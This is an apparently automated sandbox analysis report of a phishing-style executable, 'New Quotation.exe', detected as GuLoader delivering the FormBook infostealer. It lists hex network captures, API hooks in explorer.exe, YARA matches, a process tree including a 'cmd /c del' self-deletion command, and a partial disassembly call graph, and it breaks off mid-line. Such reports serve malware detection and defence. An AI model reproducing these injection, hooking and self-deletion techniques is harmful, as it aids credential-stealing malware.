                                                                                                                                                                                        2022-06-10 05:52:17 UTC185INData Raw: ce 51 64 12 10 81 2d 86 58 f1 d7 35 62 1b 21 02 28 5c aa 87 a6 42 4d 9f 5c f6 22 c8 fd 8f 0d 38 0c fd 37 7f 7d 5b a5 7c 91 d6 eb bc ac a8 28 5f 91 19 32 04 ec d7 7a ef 9b ff e2 44 de 70 e5 f3 ae 14 8a 88 91 58 9b dd d0 aa 72 2f bf ae 6d ba 81 b6 af f7 9f c8 04 1a 14 26 f0 c9 53 4e 83 96 31 e4 fb 15 ab 20 bc 06 fe 3e 7a 7b e9 4d 52 e4 1d 76 85 71 f5 af 6c 71 59 cf 82 7f f6 c1 d0 01 ce c7 c8 0e bb 80 ce ea cd b5 76 3b 68 84 6f 02 45 02 21 23 ad 88 9a 21 5d dc 6c 7a e3 28 e7 c4 8a 83 1c d2 7f e7 21 a7 23 18 3c 05 f1 af e3 00 2b 54 52 75 bf fb c0 2e 90 bb ed 2a ed da 1f 93 68 2b f2 42 f6 ff fa fe 6a d3 52 f3 63 8e 6a c4 df f8 da 11 8b fa c6 0b 5d 3d 12 44 7e 16 9f 6d 94 93 41 8b a9 60 1b bd b0 5c 12 f0 30 e8 8d db 67 a6 35 43 17 ca 8f 5b fa cc 65 83 cc cf 91
                                                                                                                                                                                        Data Ascii: Qd-X5b!(\BM\"87}[|(_2zDpXr/m&SN1 >z{MRvqlqYv;hoE!#!]lz(!#<+TRu.*h+BjRcj]=D~mA`\0g5C[e
                                                                                                                                                                                        2022-06-10 05:52:17 UTC186INData Raw: 10 e0 a1 36 20 96 7c 40 5f b4 8a ea f8 35 7d 03 72 7b 8d c8 67 d4 1b 94 e0 a6 92 30 68 2d da f8 54 f3 34 90 2e 24 4a 33 95 88 3c 15 25 9d 09 b8 06 7a 5b 57 e6 ad 47 47 6e 71 6f 7a f8 84 a3 97 8a 0d d3 4c 16 c3 d7 ea 26 0e db dc 42 54 c3 89 35 e9 bd 8e e2 db bf 15 8e d5 b8 ab 9d 1d a5 89 57 4a 4f 57 b0 12 07 36 5b 9b 38 98 8c ac c6 4a 78 2e 60 ff 40 e6 2d a3 b5 28 b0 e0 fd a3 19 50 8c 8f f1 d2 cd 1a 1b 5d 26 ae 68 15 57 e3 20 cf 13 79 d0 c1 7a 39 df d4 25 c5 4f eb 6d 6f fd b6 f5 30 09 09 15 59 60 51 f3 3d 60 b5 4b 3c 54 5b fc 7a 37 e2 a0 91 16 77 97 2e 85 d9 18 73 37 35 4c 1d c8 fa 60 53 6f 25 9c de 1b 38 37 5b da e7 91 b4 5c 04 fd 6b f3 c9 c6 c7 fe 17 a9 7d 3d 33 09 4b c0 ec 7b ab bb 50 5c b2 d1 5f 7d 56 4e bf 83 0b 05 99 a9 72 8c ad 27 ad 3b ed aa bc 96
                                                                                                                                                                                        Data Ascii: 6 |@_5}r{g0h-T4.$J3<%z[WGGnqozL&BT5WJOW6[8Jx.`@-(P]&hW yz9%Omo0Y`Q=`K<T[z7w.s75L`So%87[\k}=3K{P\_}VNr';
                                                                                                                                                                                        2022-06-10 05:52:17 UTC188INData Raw: 6c 33 7f 6f c0 45 0c 0a a5 2d 6f 59 e8 98 0c 9c bb 8d 8b b4 e8 40 bf fa 6f 89 71 3d fa 3c 08 48 23 2c 48 9d c3 45 4f 30 80 19 ad bf 7a 3e 1c 48 fa c0 70 e7 2e aa d9 c5 a7 01 db d9 19 9f 9b bc a5 41 eb f4 ba 32 63 13 a2 3b 36 05 0f 4a 2d df 84 41 d7 39 6e 91 31 17 15 ed 12 b2 4c 3b 82 71 e2 d9 d9 f5 16 7a bf cc 92 01 ab e8 f7 5c 7e d6 52 95 9a 26 01 92 89 29 31 63 dd 75 9d 09 0b bc 45 fb c1 46 52 4c 80 6c 1f d5 c5 a5 7a a3 28 0c db d2 38 1f fa e7 95 11 19 47 7e 27 a5 f8 0a d7 ae b8 b3 bc 6c 66 75 50 9a ea 6e 5e bd 29 c9 6b cc 4a bc 33 d4 10 9c 73 22 eb fb db 2f 2b be ff 42 38 ab 37 67 d7 a6 7f 97 77 3d 22 ca b9 55 80 45 bf 27 b9 16 cf 91 b0 18 49 71 73 e0 43 01 2c 1b 1c 52 0c 59 d5 93 14 e6 e5 bc 24 15 1b 61 aa 24 ae 57 90 15 ad bd 19 f9 1e 2d 45 91 42 cc
                                                                                                                                                                                        Data Ascii: l3oE-oY@oq=<H#,HEO0z>Hp.A2c;6J-A9n1L;qz\~R&)1cuEFRLlz(8G~'lfuPn^)kJ3s"/+B87gw="UE'IqsC,RY$a$W-EB
                                                                                                                                                                                        2022-06-10 05:52:17 UTC189INData Raw: fd 7b f5 9d 33 e8 07 dc cb 12 d2 32 95 fc 9f c7 d8 0e 2e 30 56 f8 cd 24 92 6b 00 fc 4a fb 97 f4 df dc d9 3d 76 f1 ca b5 fd 58 04 2d fd a0 5e 57 60 69 15 d3 39 1b fd ca b0 e0 bc 41 c6 29 39 35 f8 49 e2 2b 35 c1 d6 7d 03 23 31 ef fe d2 bb 7b 9e b7 8e 91 99 21 cf de 91 63 07 09 44 2c d0 59 35 72 e2 8f 94 ab 06 97 d1 a8 a2 b3 af 5e 88 b8 c5 9e 3c 7e 8b c6 5a 83 f2 ae ff 41 ed f2 8c ba 5d 72 03 10 c2 00 8d 45 7f fb 7c 1b 4b 4d 46 85 55 c3 b4 e7 60 aa f6 35 1d ab c1 4a 28 9a 01 38 08 f2 e5 89 29 90 40 ce 2e 62 f8 f0 1b b3 50 76 2b c7 30 4c f1 2a e6 8d ee 0f 40 c3 6f a6 ec 8b 87 06 f6 47 a0 2b 02 75 6c ff bf 84 24 61 69 b3 b7 be 34 26 17 77 2d 6f b1 3a d2 6e fd 17 29 b4 10 ae fb f2 80 fe 87 78 4a d2 ea 3c c7 43 ee 23 bb c4 54 76 ba 21 83 ab 31 7a 73 d5 ba c0 55
                                                                                                                                                                                        Data Ascii: {32.0V$kJ=vX-^W`i9A)95I+5}#1{!cD,Y5r^<~ZA]rE|KMFU`5J(8)@.bPv+0L*@oG+ul$ai4&w-o:n)xJ<C#Tv!1zsU
                                                                                                                                                                                        2022-06-10 05:52:17 UTC190INData Raw: bf 01 f6 f9 ab 03 70 5d ab 0d c0 5a 59 49 b3 49 ba dc 3a 10 7d 10 cf b1 5d 44 73 90 97 3c b7 e1 10 a6 32 2e 0a 07 d0 b3 34 70 b3 3a 10 df b9 4a 02 ad 88 70 41 c9 ea 0d be 36 38 e7 b1 6d 93 e6 a9 23 88 a6 92 2e d6 6a f1 29 2b de 2e 68 5c 8b 71 df 14 c6 f8 cb d8 95 f9 7e 60 30 46 43 71 1d 15 4d d5 e8 59 50 3e 89 15 0a ec 7c 92 e0 9e 1b 5e ca 58 2e 8b e8 15 3e d5 96 c1 49 1f 00 c9 5f 64 70 c6 ac dd 76 4d d3 d9 1b 2a 6b 3c 60 21 91 32 9e b6 db c5 81 91 48 a6 6e 86 19 47 64 e8 3d af 2b e9 db 15 ed 88 42 74 10 ac 58 6a 85 d3 b2 21 66 39 87 c6 13 33 dd 21 00 a7 dd 9a d4 82 f8 12 de f0 67 bc b9 e4 84 70 0d 8b a3 4a 6c 04 86 12 96 46 9c
                                                                                                                                                                                        Data Ascii: p]ZYII:}]Ds<2.4p:JpA68m#.j)+.h\q~`0FCqMYP>|^X.>I_dpvM*k<`!2HnGd=+BtXj!f93!gpJlF


                                                                                                                                                                                        Code Manipulations

                                                                                                                                                                                        User Modules

                                                                                                                                                                                        Hook Summary

                                                                                                                                                                                        Function NameHook TypeActive in Processes
                                                                                                                                                                                        PeekMessageAINLINEexplorer.exe
                                                                                                                                                                                        PeekMessageWINLINEexplorer.exe
                                                                                                                                                                                        GetMessageWINLINEexplorer.exe
                                                                                                                                                                                        GetMessageAINLINEexplorer.exe

                                                                                                                                                                                        Processes

                                                                                                                                                                                        Process: explorer.exe, Module: user32.dll
                                                                                                                                                                                        Function NameHook TypeNew Data
                                                                                                                                                                                        PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xED
                                                                                                                                                                                        PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xED
                                                                                                                                                                                        GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xED
                                                                                                                                                                                        GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xED

                                                                                                                                                                                        Statistics

                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                        Behavior

                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                        System Behavior

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                        Start time:07:51:37
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\New Quotation.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:197080 bytes
                                                                                                                                                                                        MD5 hash:C69011DF1FDEBC08F5098A7F4D6098D2
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.49393683934.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                        Start time:07:52:01
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Users\user\Desktop\New Quotation.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\New Quotation.exe"
                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                        File size:197080 bytes
                                                                                                                                                                                        MD5 hash:C69011DF1FDEBC08F5098A7F4D6098D2
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.49634007280.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000000.49187750639.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.49659534027.000000001D440000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                        Start time:07:52:17
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                        Imagebase:0x7ff632df0000
                                                                                                                                                                                        File size:4849904 bytes
                                                                                                                                                                                        MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.49489746868.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.49433524155.00000000139C7000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                        Start time:07:52:34
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                                                                                                                        Imagebase:0xc80000
                                                                                                                                                                                        File size:851968 bytes
                                                                                                                                                                                        MD5 hash:469594005E3B94C5945BCCE7FC521C05
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                        Start time:07:52:35
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\autochk.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\autochk.exe
                                                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                                                        File size:875008 bytes
                                                                                                                                                                                        MD5 hash:95127C028063423E1253BD0C8CD6C9CB
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                        Start time:07:52:35
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                                                                                        Imagebase:0xc90000
                                                                                                                                                                                        File size:831488 bytes
                                                                                                                                                                                        MD5 hash:ABC9F7DAB410FE452D2D90C9960077BE
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                        Start time:07:52:43
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                        Imagebase:0xc20000
                                                                                                                                                                                        File size:82432 bytes
                                                                                                                                                                                        MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.53994093516.0000000000980000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.53994922758.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.53993431325.0000000000710000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                        Reputation:low

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                        Start time:07:52:47
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                        Commandline:/c del "C:\Users\user\Desktop\New Quotation.exe"
                                                                                                                                                                                        Imagebase:0x7ff760da0000
                                                                                                                                                                                        File size:236544 bytes
                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:moderate

                                                                                                                                                                                        General

                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                        Start time:07:52:48
                                                                                                                                                                                        Start date:10/06/2022
                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                        Imagebase:0x7ff63be40000
                                                                                                                                                                                        File size:875008 bytes
                                                                                                                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high

                                                                                                                                                                                        Disassembly

                                                                                                                                                                                        Reset < >

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:21.2%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:16.2%
                                                                                                                                                                                          Total number of Nodes:1569
                                                                                                                                                                                          Total number of Limit Nodes:37
                                                                                                                                                                                          execution_graph 3923 401941 3924 401943 3923->3924 3929 402da6 3924->3929 3930 402db2 3929->3930 3974 40657a 3930->3974 3933 401948 3935 405c49 3933->3935 4016 405f14 3935->4016 3938 405c71 DeleteFileW 3940 401951 3938->3940 3939 405c88 3945 405da8 3939->3945 4030 40653d lstrcpynW 3939->4030 3942 405cae 3943 405cc1 3942->3943 3944 405cb4 lstrcatW 3942->3944 4031 405e58 lstrlenW 3943->4031 3949 405cc7 3944->3949 3945->3940 4059 406873 FindFirstFileW 3945->4059 3948 405cd7 lstrcatW 3951 405ce2 lstrlenW FindFirstFileW 3948->3951 3949->3948 3949->3951 3951->3945 3959 405d04 3951->3959 3952 405dd1 4062 405e0c lstrlenW CharPrevW 3952->4062 3955 405c01 5 API calls 3958 405de3 3955->3958 3957 405d8b FindNextFileW 3957->3959 3960 405da1 FindClose 3957->3960 3961 405de7 3958->3961 3962 405dfd 3958->3962 3959->3957 3970 405d4c 3959->3970 4035 40653d lstrcpynW 3959->4035 3960->3945 3961->3940 3965 40559f 24 API calls 3961->3965 3964 40559f 24 API calls 3962->3964 3964->3940 3967 405df4 3965->3967 3966 405c49 60 API calls 3966->3970 3969 4062fd 36 API calls 3967->3969 3968 40559f 24 API calls 3968->3957 3971 405dfb 3969->3971 3970->3957 3970->3966 3970->3968 4036 405c01 3970->4036 4044 40559f 3970->4044 4055 4062fd MoveFileExW 3970->4055 3971->3940 3975 406587 3974->3975 3976 4067aa 3975->3976 3979 406778 lstrlenW 3975->3979 3981 40657a 10 API calls 3975->3981 3982 40668f GetSystemDirectoryW 3975->3982 3985 4066a2 GetWindowsDirectoryW 3975->3985 3986 406719 lstrcatW 3975->3986 3987 40657a 10 API calls 3975->3987 3988 4067c4 5 API calls 3975->3988 3989 4066d1 SHGetSpecialFolderLocation 3975->3989 4000 40640b 3975->4000 4005 406484 wsprintfW 3975->4005 4006 40653d lstrcpynW 3975->4006 3977 402dd3 3976->3977 4007 40653d lstrcpynW 3976->4007 3977->3933 3991 4067c4 3977->3991 3979->3975 3981->3979 3982->3975 3985->3975 3986->3975 3987->3975 3988->3975 3989->3975 3990 4066e9 SHGetPathFromIDListW CoTaskMemFree 3989->3990 3990->3975 3998 4067d1 3991->3998 3992 406847 3993 40684c CharPrevW 3992->3993 3995 40686d 3992->3995 3993->3992 3994 40683a CharNextW 3994->3992 3994->3998 3995->3933 3997 406826 CharNextW 3997->3998 3998->3992 3998->3994 3998->3997 3999 406835 CharNextW 3998->3999 4012 405e39 3998->4012 3999->3994 4008 4063aa 4000->4008 4003 40643f RegQueryValueExW RegCloseKey 4004 40646f 4003->4004 4004->3975 4005->3975 4006->3975 4007->3977 4009 4063b9 4008->4009 4010 4063c2 RegOpenKeyExW 4009->4010 4011 4063bd 4009->4011 4010->4011 4011->4003 4011->4004 4013 405e3f 4012->4013 4014 405e55 4013->4014 4015 405e46 CharNextW 4013->4015 4014->3998 4015->4013 4065 40653d lstrcpynW 4016->4065 4018 405f25 4066 405eb7 CharNextW CharNextW 4018->4066 4021 405c69 4021->3938 4021->3939 4022 4067c4 5 API calls 4027 405f3b 4022->4027 4023 405f6c lstrlenW 4024 405f77 4023->4024 4023->4027 4026 405e0c 3 API calls 4024->4026 4025 406873 2 API calls 4025->4027 4028 405f7c GetFileAttributesW 4026->4028 4027->4021 4027->4023 4027->4025 4029 405e58 2 API calls 4027->4029 4028->4021 4029->4023 4030->3942 4032 405e66 4031->4032 4033 405e78 4032->4033 4034 405e6c CharPrevW 4032->4034 4033->3949 4034->4032 4034->4033 4035->3959 4072 406008 GetFileAttributesW 4036->4072 4039 405c2e 4039->3970 4040 405c24 DeleteFileW 4042 405c2a 4040->4042 4041 405c1c RemoveDirectoryW 4041->4042 4042->4039 4043 405c3a SetFileAttributesW 4042->4043 4043->4039 4045 4055ba 4044->4045 4054 40565c 4044->4054 4046 4055d6 lstrlenW 4045->4046 4047 40657a 17 API calls 4045->4047 4048 4055e4 lstrlenW 4046->4048 4049 4055ff 4046->4049 4047->4046 4050 4055f6 lstrcatW 4048->4050 4048->4054 4051 405612 4049->4051 4052 405605 SetWindowTextW 4049->4052 4050->4049 4053 405618 SendMessageW SendMessageW SendMessageW 4051->4053 4051->4054 4052->4051 4053->4054 4054->3970 4056 40631e 4055->4056 4057 406311 4055->4057 4056->3970 4075 406183 4057->4075 4060 405dcd 4059->4060 4061 406889 FindClose 4059->4061 4060->3940 4060->3952 4061->4060 4063 405dd7 4062->4063 4064 405e28 lstrcatW 4062->4064 4063->3955 4064->4063 4065->4018 4067 405ed4 4066->4067 4069 405ee6 4066->4069 4068 405ee1 CharNextW 4067->4068 4067->4069 4071 405f0a 4068->4071 4070 405e39 CharNextW 4069->4070 4069->4071 4070->4069 4071->4021 4071->4022 4073 405c0d 4072->4073 4074 40601a SetFileAttributesW 4072->4074 4073->4039 4073->4040 4073->4041 4074->4073 4076 4061b3 4075->4076 4077 4061d9 GetShortPathNameW 4075->4077 4102 40602d GetFileAttributesW CreateFileW 4076->4102 4079 4062f8 4077->4079 4080 4061ee 4077->4080 4079->4056 4080->4079 4082 4061f6 wsprintfA 4080->4082 4081 4061bd CloseHandle GetShortPathNameW 4081->4079 4083 4061d1 4081->4083 4084 40657a 17 API calls 4082->4084 4083->4077 4083->4079 4085 40621e 4084->4085 4103 40602d GetFileAttributesW CreateFileW 4085->4103 4087 40622b 4087->4079 4088 40623a GetFileSize GlobalAlloc 4087->4088 4089 4062f1 CloseHandle 4088->4089 4090 40625c 4088->4090 4089->4079 4104 4060b0 ReadFile 4090->4104 4095 40627b lstrcpyA 4098 40629d 4095->4098 4096 40628f 4097 405f92 4 API calls 4096->4097 4097->4098 4099 4062d4 SetFilePointer 4098->4099 4111 4060df WriteFile 4099->4111 4102->4081 4103->4087 4105 4060ce 4104->4105 4105->4089 4106 405f92 lstrlenA 4105->4106 4107 405fd3 lstrlenA 4106->4107 4108 405fac lstrcmpiA 4107->4108 4110 405fdb 4107->4110 4109 405fca CharNextA 4108->4109 4108->4110 4109->4107 4110->4095 4110->4096 4112 4060fd GlobalFree 4111->4112 4112->4089 4113 4015c1 4114 402da6 17 API calls 4113->4114 4115 4015c8 4114->4115 4116 405eb7 4 API calls 4115->4116 4128 4015d1 4116->4128 4117 401631 4119 401663 4117->4119 4120 401636 4117->4120 4118 405e39 CharNextW 4118->4128 4122 401423 24 API calls 4119->4122 4140 401423 4120->4140 4130 40165b 4122->4130 4127 40164a SetCurrentDirectoryW 4127->4130 4128->4117 4128->4118 4129 401617 GetFileAttributesW 4128->4129 4132 405b08 4128->4132 4135 405a6e CreateDirectoryW 4128->4135 4144 405aeb CreateDirectoryW 4128->4144 4129->4128 4147 40690a GetModuleHandleA 4132->4147 4136 405abb 4135->4136 4137 405abf GetLastError 4135->4137 4136->4128 4137->4136 4138 405ace SetFileSecurityW 4137->4138 4138->4136 4139 405ae4 GetLastError 4138->4139 4139->4136 4141 40559f 24 API calls 4140->4141 4142 401431 4141->4142 4143 40653d lstrcpynW 4142->4143 4143->4127 4145 405afb 4144->4145 4146 405aff GetLastError 4144->4146 4145->4128 4146->4145 4148 406930 GetProcAddress 4147->4148 4149 406926 4147->4149 4150 405b0f 4148->4150 4153 40689a GetSystemDirectoryW 4149->4153 4150->4128 4152 40692c 4152->4148 4152->4150 4154 4068bc wsprintfW LoadLibraryExW 4153->4154 4154->4152 5008 401c43 5009 402d84 17 API calls 5008->5009 5010 401c4a 5009->5010 5011 402d84 17 API calls 5010->5011 5012 401c57 5011->5012 5013 401c6c 5012->5013 5014 402da6 17 API calls 5012->5014 5015 401c7c 5013->5015 5016 402da6 17 API calls 5013->5016 5014->5013 5017 401cd3 5015->5017 5018 401c87 5015->5018 5016->5015 5019 402da6 17 API calls 5017->5019 5020 402d84 17 API calls 5018->5020 5021 401cd8 5019->5021 5022 401c8c 5020->5022 5024 402da6 17 API calls 5021->5024 5023 402d84 17 API calls 5022->5023 5025 401c98 5023->5025 5026 401ce1 FindWindowExW 5024->5026 5027 401cc3 SendMessageW 5025->5027 5028 401ca5 SendMessageTimeoutW 5025->5028 5029 401d03 5026->5029 5027->5029 5028->5029 5030 404943 5031 404953 5030->5031 5032 404979 5030->5032 5033 404499 18 API calls 5031->5033 5034 404500 8 API calls 5032->5034 5035 404960 SetDlgItemTextW 5033->5035 5036 404985 5034->5036 5035->5032 5037 7109170d 5043 710915b6 5037->5043 5039 7109176b GlobalFree 5040 71091725 5040->5039 5041 71091740 5040->5041 5042 71091757 VirtualFree 5040->5042 5041->5039 5042->5039 5044 710915bc 5043->5044 5045 710915c2 5044->5045 5046 710915ce GlobalFree 5044->5046 5045->5040 5046->5040 5047 4028c4 5048 4028ca 5047->5048 5049 4028d2 FindClose 5048->5049 5050 402c2a 5048->5050 5049->5050 5051 71091000 5054 7109101b 5051->5054 5055 710915b6 GlobalFree 5054->5055 5056 71091020 5055->5056 5057 71091024 5056->5057 5058 71091027 GlobalAlloc 5056->5058 5059 710915dd 3 API calls 5057->5059 5058->5057 5060 71091019 5059->5060 5064 4016cc 5065 402da6 17 API calls 5064->5065 5066 4016d2 GetFullPathNameW 5065->5066 5067 4016ec 5066->5067 5073 40170e 5066->5073 5070 406873 2 API 